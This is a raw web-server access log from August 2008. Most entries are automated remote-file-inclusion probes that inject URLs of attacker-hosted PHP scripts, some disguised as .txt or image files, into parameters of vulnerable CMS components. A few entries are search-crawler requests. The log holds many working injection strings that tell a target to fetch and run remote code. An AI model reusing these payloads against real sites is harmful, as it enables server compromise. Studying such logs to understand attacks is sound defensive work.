87.106.191.136 - - [07/Aug/2008:00:28:17 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.191.136 - - [07/Aug/2008:00:28:17 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
217.172.183.147 - - [07/Aug/2008:00:28:24 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
217.172.183.147 - - [07/Aug/2008:00:28:24 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
217.172.183.147 - - [07/Aug/2008:00:28:25 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
217.172.183.147 - - [07/Aug/2008:00:28:25 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
217.172.183.147 - - [07/Aug/2008:00:28:25 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
217.172.183.147 - - [07/Aug/2008:00:28:25 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
217.172.183.147 - - [07/Aug/2008:00:28:35 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
217.172.183.147 - - [07/Aug/2008:00:28:35 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
72.248.189.215 - - [07/Aug/2008:00:35:33 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
72.248.189.215 - - [07/Aug/2008:00:35:34 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
72.248.189.215 - - [07/Aug/2008:00:35:34 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
89.108.67.156 - - [07/Aug/2008:00:35:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/raf_ly.com/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
89.108.67.156 - - [07/Aug/2008:00:35:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/raf_ly.com/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
66.79.163.110 - - [07/Aug/2008:00:37:00 -0500] "GET /logs/access_log.1213315200/?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
66.79.163.110 - - [07/Aug/2008:00:37:43 -0500] "GET /logs/access_log.1213142400/?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
89.108.67.156 - - [07/Aug/2008:00:38:18 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/stevf57/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
89.108.67.156 - - [07/Aug/2008:00:38:18 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/stevf57/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
64.22.100.83 - - [07/Aug/2008:00:39:22 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:39:22 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:39:23 -0500] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:39:23 -0500] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:39:23 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:39:23 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.813"
72.248.189.215 - - [07/Aug/2008:00:39:40 -0500] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
64.22.100.83 - - [07/Aug/2008:00:40:19 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:40:19 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 94316 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:40:19 -0500] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.813"
64.22.100.83 - - [07/Aug/2008:00:40:20 -0500] "GET //?path%5Bdocroot%5D=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.813"
88.191.59.190 - - [07/Aug/2008:00:41:53 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:41:54 -0500] "GET /errors.php?error=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:41:54 -0500] "GET /logs/errors.php?error=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.224.152.230 - - [07/Aug/2008:00:42:19 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
66.224.152.230 - - [07/Aug/2008:00:42:19 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
66.224.152.230 - - [07/Aug/2008:00:42:20 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
88.191.59.190 - - [07/Aug/2008:00:42:28 -0500] "GET //appserv/main.php?appserv_root=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
65.55.208.137 - - [07/Aug/2008:00:43:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [07/Aug/2008:00:43:07 -0500] "GET /logs/access_log.1215734400 HTTP/1.1" 200 499687 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.191.136 - - [07/Aug/2008:00:43:48 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.106.191.136 - - [07/Aug/2008:00:43:48 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.191.136 - - [07/Aug/2008:00:43:49 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.191.136 - - [07/Aug/2008:00:43:56 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.106.191.136 - - [07/Aug/2008:00:43:56 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.191.136 - - [07/Aug/2008:00:43:56 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bfvwar.roninofsweden.se/r.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
209.97.201.148 - - [07/Aug/2008:00:44:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
209.97.201.148 - - [07/Aug/2008:00:44:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
88.191.59.190 - - [07/Aug/2008:00:45:20 -0500] "GET /logs/access_log.1213315200/errors.php?error=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:45:22 -0500] "GET /logs/access_log.1213142400/errors.php?error=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.108.67.220 - - [07/Aug/2008:00:45:22 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
89.108.67.220 - - [07/Aug/2008:00:45:22 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jancokz.co.cc/idnews.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
216.246.78.8 - - [07/Aug/2008:00:47:45 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
216.246.78.8 - - [07/Aug/2008:00:47:45 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
88.191.59.190 - - [07/Aug/2008:00:48:52 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:48:53 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:48:53 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:48:54 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
213.91.246.64 - - [07/Aug/2008:00:49:41 -0500] "GET /logs/access_log.1206230400/components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
213.91.246.64 - - [07/Aug/2008:00:49:41 -0500] "GET /components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
213.91.246.64 - - [07/Aug/2008:00:49:42 -0500] "GET /logs/components/com_mambowiki/MamboLogin.php?IP=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:49:46 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:49:46 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:52:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:52:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:52:51 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:52:51 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.79.163.110 - - [07/Aug/2008:00:53:15 -0500] "GET /logs/access_log.1206230400/?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
88.191.59.190 - - [07/Aug/2008:00:54:31 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:54:31 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:55:04 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:55:04 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
70.86.236.106 - - [07/Aug/2008:00:55:14 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://nkdb.org/AsaMall/makeup/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
70.86.236.106 - - [07/Aug/2008:00:55:14 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://nkdb.org/AsaMall/makeup/id.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
88.191.59.190 - - [07/Aug/2008:00:56:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:00:56:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.246.78.8 - - [07/Aug/2008:00:57:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
216.246.78.8 - - [07/Aug/2008:00:57:43 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
58.102.118.201 - - [07/Aug/2008:01:00:04 -0500] "GET /logs/access_log.1213315200//convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
58.102.118.201 - - [07/Aug/2008:01:00:04 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
58.102.118.201 - - [07/Aug/2008:01:00:05 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://bjork.name.md/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
72.248.189.215 - - [07/Aug/2008:01:06:59 -0500] "GET /logs/access_log.1214438400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
203.98.87.14 - - [07/Aug/2008:01:12:04 -0500] "GET /logs/access_log.1214438400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
203.98.87.14 - - [07/Aug/2008:01:12:04 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
203.98.87.14 - - [07/Aug/2008:01:12:05 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
193.164.133.17 - - [07/Aug/2008:01:12:33 -0500] "GET /logs/access_log.1216080000 HTTP/1.1" 200 427909 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.97.201.148 - - [07/Aug/2008:01:15:23 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
209.97.201.148 - - [07/Aug/2008:01:15:23 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
72.248.189.215 - - [07/Aug/2008:01:15:50 -0500] "GET /logs/access_log.1212883200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
88.191.59.190 - - [07/Aug/2008:01:17:35 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:01:17:35 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:01:17:42 -0500] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
88.191.59.190 - - [07/Aug/2008:01:17:42 -0500] "GET /oneadmin/calendar/include.php?path[docroot]=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
208.113.240.100 - - [07/Aug/2008:01:18:24 -0500] "GET /logs/access_log.1206230400//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
208.113.240.100 - - [07/Aug/2008:01:18:24 -0500] "GET /logs//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
208.113.240.100 - - [07/Aug/2008:01:18:24 -0500] "GET //administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
72.248.189.215 - - [07/Aug/2008:01:18:53 -0500] "GET /logs/access_log.1213142400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
70.86.236.106 - - [07/Aug/2008:01:19:26 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
70.86.236.106 - - [07/Aug/2008:01:19:26 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
72.248.189.215 - - [07/Aug/2008:01:22:23 -0500] "GET /logs/access_log.1213315200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.65"
216.75.35.118 - - [07/Aug/2008:01:23:19 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
216.75.35.118 - - [07/Aug/2008:01:23:19 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
216.75.35.118 - - [07/Aug/2008:01:23:19 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.6.18.231 - - [07/Aug/2008:01:24:36 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.231 - - [07/Aug/2008:01:24:36 -0500] "GET /logs/access_log.1165449600 HTTP/1.0" 200 207369 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.75.35.118 - - [07/Aug/2008:01:24:39 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
216.75.35.118 - - [07/Aug/2008:01:25:26 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.49.100.20 - - [07/Aug/2008:01:26:21 -0500] "GET /logs/access_log.1206230400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
200.49.100.20 - - [07/Aug/2008:01:26:21 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
85.17.150.2 - - [07/Aug/2008:01:26:23 -0500] "GET /logs/access_log.1203638400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:01:26:23 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:01:26:23 -0500] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.49.100.20 - - [07/Aug/2008:01:26:28 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
85.17.150.2 - - [07/Aug/2008:01:26:32 -0500] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.98.87.14 - - [07/Aug/2008:01:26:33 -0500] "GET /logs/access_log.1212883200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
213.139.163.236 - - [07/Aug/2008:01:29:08 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.139.163.236 - - [07/Aug/2008:01:29:09 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.17.150.2 - - [07/Aug/2008:01:29:35 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.98.87.14 - - [07/Aug/2008:01:32:00 -0500] "GET /logs/access_log.1213142400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
74.6.18.231 - - [07/Aug/2008:01:32:33 -0500] "GET /rachel%2520study HTTP/1.0" 404 286 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.98.87.14 - - [07/Aug/2008:01:34:22 -0500] "GET /logs/access_log.1213315200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
89.188.110.128 - - [07/Aug/2008:01:34:30 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.188.110.128 - - [07/Aug/2008:01:34:31 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.188.110.128 - - [07/Aug/2008:01:34:51 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.188.110.128 - - [07/Aug/2008:01:36:33 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.101.4.49 - - [07/Aug/2008:01:38:52 -0500] "GET /logs//include/write.php?dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Aug/2008:01:38:52 -0500] "GET //include/write.php?dir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
128.121.50.50 - - [07/Aug/2008:01:41:59 -0500] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
128.121.50.50 - - [07/Aug/2008:01:41:59 -0500] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
85.17.150.2 - - [07/Aug/2008:01:42:00 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:01:42:00 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
